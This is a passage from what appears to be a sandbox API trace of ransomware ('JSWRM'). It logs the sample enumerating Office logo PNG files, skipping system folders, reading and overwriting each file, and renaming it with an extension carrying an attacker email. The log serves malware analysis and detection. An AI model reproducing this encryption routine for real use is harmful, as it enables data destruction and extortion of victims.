cAlternateFileName="EXCELL~3.PNG")) returned 1 [0132.400] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-140.png", lpString2=".") returned 1 [0132.400] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-140.png", lpString2="..") returned 1 [0132.400] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-140.png", lpString2="...") returned 1 [0132.400] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-140.png", lpString2="windows") returned -1 [0132.400] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-140.png", lpString2="recovery") returned -1 [0132.400] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-140.png", lpString2="perflogs") returned -1 [0132.400] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-140.png", lpString2="documents and settings") returned 1 [0132.400] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0132.400] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-140.png", lpString2="system volume information") returned -1 [0132.400] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-140.png", lpString2="msocache") returned -1 [0132.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-white_scale-140.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0132.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-white_scale-140.png", cchWideChar=38, lpMultiByteStr=0x22ce70, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogo.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 38 [0132.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-white_scale-140.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0132.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-white_scale-140.png", cchWideChar=38, lpMultiByteStr=0x22cdc8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogo.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 38 [0132.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.401] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.contrast-white_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.401] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3032) returned 1 [0132.401] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.402] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xbd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xbd0, lpOverlapped=0x0) returned 1 [0132.403] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.403] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xbd0, lpOverlapped=0x0) returned 1 [0132.403] CloseHandle (hObject=0x238) returned 1 [0132.403] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.contrast-white_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.contrast-white_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.contrast-white_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.404] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a723def, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a723def, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a723def, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe43, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="ExcelLogo.contrast-white_scale-180.png", cAlternateFileName="EX529E~1.PNG")) returned 1 [0132.404] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-180.png", lpString2=".") returned 1 [0132.404] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-180.png", lpString2="..") returned 1 [0132.404] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-180.png", lpString2="...") returned 1 [0132.404] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-180.png", lpString2="windows") returned -1 [0132.404] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-180.png", lpString2="recovery") returned -1 [0132.404] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-180.png", lpString2="perflogs") returned -1 [0132.405] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-180.png", lpString2="documents and settings") returned 1 [0132.405] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0132.405] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-180.png", lpString2="system volume information") returned -1 [0132.405] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-180.png", lpString2="msocache") returned -1 [0132.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-white_scale-180.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0132.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-white_scale-180.png", cchWideChar=38, lpMultiByteStr=0x22d0d8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogo.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 38 [0132.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-white_scale-180.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0132.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-white_scale-180.png", cchWideChar=38, lpMultiByteStr=0x22cdc8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogo.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 38 [0132.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.405] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.contrast-white_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.406] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3651) returned 1 [0132.406] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.406] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xe40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xe40, lpOverlapped=0x0) returned 1 [0132.408] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.408] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xe40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xe40, lpOverlapped=0x0) returned 1 [0132.408] CloseHandle (hObject=0x238) returned 1 [0132.409] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.contrast-white_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.contrast-white_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.contrast-white_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.413] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19889710, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19889710, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19889710, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7c4, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="ExcelLogo.contrast-white_scale-80.png", cAlternateFileName="EXCELL~1.PNG")) returned 1 [0132.413] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-80.png", lpString2=".") returned 1 [0132.413] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-80.png", lpString2="..") returned 1 [0132.413] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-80.png", lpString2="...") returned 1 [0132.413] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-80.png", lpString2="windows") returned -1 [0132.413] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-80.png", lpString2="recovery") returned -1 [0132.413] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-80.png", lpString2="perflogs") returned -1 [0132.413] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-80.png", lpString2="documents and settings") returned 1 [0132.413] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0132.413] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-80.png", lpString2="system volume information") returned -1 [0132.413] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-80.png", lpString2="msocache") returned -1 [0132.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-white_scale-80.png", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0132.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-white_scale-80.png", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogo.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 37 [0132.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-white_scale-80.png", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0132.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-white_scale-80.png", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogo.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 37 [0132.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.413] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.contrast-white_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.414] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1988) returned 1 [0132.414] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.414] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x7c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x7c0, lpOverlapped=0x0) returned 1 [0132.416] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.416] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x7c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x7c0, lpOverlapped=0x0) returned 1 [0132.416] CloseHandle (hObject=0x238) returned 1 [0132.416] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.contrast-white_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.contrast-white_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.contrast-white_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.417] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198afa29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198afa29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198afa29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x929, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="ExcelLogo.scale-100.png", cAlternateFileName="EXCELL~4.PNG")) returned 1 [0132.417] lstrcmpiW (lpString1="ExcelLogo.scale-100.png", lpString2=".") returned 1 [0132.417] lstrcmpiW (lpString1="ExcelLogo.scale-100.png", lpString2="..") returned 1 [0132.417] lstrcmpiW (lpString1="ExcelLogo.scale-100.png", lpString2="...") returned 1 [0132.417] lstrcmpiW (lpString1="ExcelLogo.scale-100.png", lpString2="windows") returned -1 [0132.417] lstrcmpiW (lpString1="ExcelLogo.scale-100.png", lpString2="recovery") returned -1 [0132.417] lstrcmpiW (lpString1="ExcelLogo.scale-100.png", lpString2="perflogs") returned -1 [0132.417] lstrcmpiW (lpString1="ExcelLogo.scale-100.png", lpString2="documents and settings") returned 1 [0132.417] lstrcmpiW (lpString1="ExcelLogo.scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0132.417] lstrcmpiW (lpString1="ExcelLogo.scale-100.png", lpString2="system volume information") returned -1 [0132.417] lstrcmpiW (lpString1="ExcelLogo.scale-100.png", lpString2="msocache") returned -1 [0132.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.scale-100.png", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0132.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.scale-100.png", cchWideChar=23, lpMultiByteStr=0x2410d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogo.scale-100.png", lpUsedDefaultChar=0x0) returned 23 [0132.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.scale-100.png", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0132.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.scale-100.png", cchWideChar=23, lpMultiByteStr=0x2411f0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogo.scale-100.png", lpUsedDefaultChar=0x0) returned 23 [0132.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.418] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.418] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2345) returned 1 [0132.418] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.418] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x920, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x920, lpOverlapped=0x0) returned 1 [0132.420] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.420] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x920, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x920, lpOverlapped=0x0) returned 1 [0132.420] CloseHandle (hObject=0x238) returned 1 [0132.420] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.421] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19889710, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19889710, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198afa29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbc0, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="ExcelLogo.scale-140.png", cAlternateFileName="EXCELL~2.PNG")) returned 1 [0132.421] lstrcmpiW (lpString1="ExcelLogo.scale-140.png", lpString2=".") returned 1 [0132.421] lstrcmpiW (lpString1="ExcelLogo.scale-140.png", lpString2="..") returned 1 [0132.421] lstrcmpiW (lpString1="ExcelLogo.scale-140.png", lpString2="...") returned 1 [0132.421] lstrcmpiW (lpString1="ExcelLogo.scale-140.png", lpString2="windows") returned -1 [0132.421] lstrcmpiW (lpString1="ExcelLogo.scale-140.png", lpString2="recovery") returned -1 [0132.421] lstrcmpiW (lpString1="ExcelLogo.scale-140.png", lpString2="perflogs") returned -1 [0132.421] lstrcmpiW (lpString1="ExcelLogo.scale-140.png", lpString2="documents and settings") returned 1 [0132.422] lstrcmpiW (lpString1="ExcelLogo.scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0132.422] lstrcmpiW (lpString1="ExcelLogo.scale-140.png", lpString2="system volume information") returned -1 [0132.422] lstrcmpiW (lpString1="ExcelLogo.scale-140.png", lpString2="msocache") returned -1 [0132.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.scale-140.png", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0132.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.scale-140.png", cchWideChar=23, lpMultiByteStr=0x241060, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogo.scale-140.png", lpUsedDefaultChar=0x0) returned 23 [0132.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.scale-140.png", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0132.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.scale-140.png", cchWideChar=23, lpMultiByteStr=0x241178, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogo.scale-140.png", lpUsedDefaultChar=0x0) returned 23 [0132.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.422] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.423] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3008) returned 1 [0132.423] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.423] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xbc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xbc0, lpOverlapped=0x0) returned 1 [0132.424] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.424] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xbc0, lpOverlapped=0x0) returned 1 [0132.424] CloseHandle (hObject=0x238) returned 1 [0132.425] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.426] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a723def, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a723def, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a723def, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdca, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="ExcelLogo.scale-180.png", cAlternateFileName="EX5FD7~1.PNG")) returned 1 [0132.426] lstrcmpiW (lpString1="ExcelLogo.scale-180.png", lpString2=".") returned 1 [0132.426] lstrcmpiW (lpString1="ExcelLogo.scale-180.png", lpString2="..") returned 1 [0132.426] lstrcmpiW 